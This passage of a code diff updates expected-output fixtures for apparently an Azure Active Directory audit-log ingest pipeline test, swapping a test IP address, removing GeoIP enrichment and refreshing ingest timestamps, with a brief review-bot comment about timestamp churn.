"67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14519,7 +13259,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -14662,7 +13402,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -14674,12 +13414,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036472800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.Serv
icePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n 
\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125243700Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14705,25 +13445,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14737,7 +13459,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -14842,7 +13564,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -14854,12 +13576,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036478700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 
(Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + 
"ingested": "2021-12-09T13:41:51.125248800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
"kind": "event", @@ -14885,25 +13607,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14917,7 +13621,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -15031,7 +13735,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
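Review bot: `event.ingested` in the `@@ -14854,12 +13576,12 @@` hunk is rewritten from the 2021-06-17 run time to the 2021-12-09 run time although the event itself is unchanged apart from the IP, so every regeneration of this fixture will churn these lines and bury the real change. If the test configuration for this data stream supports masking run-dependent fields, listing `event.ingested` there (something like `dynamic_fields: event.ingested: ".*"` in the pipeline test config) would keep the expected file stable across regenerations; I am inferring that mechanism from the field name and cannot confirm it from this diff. The same hunk also shows the IP duplicated into `ActorIpAddress`, `ClientIP`, `client.ip` and `client.address`, so any future address change must be applied to all four to keep the fixture self-consistent.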
@@ -15043,12 +13747,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036483200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
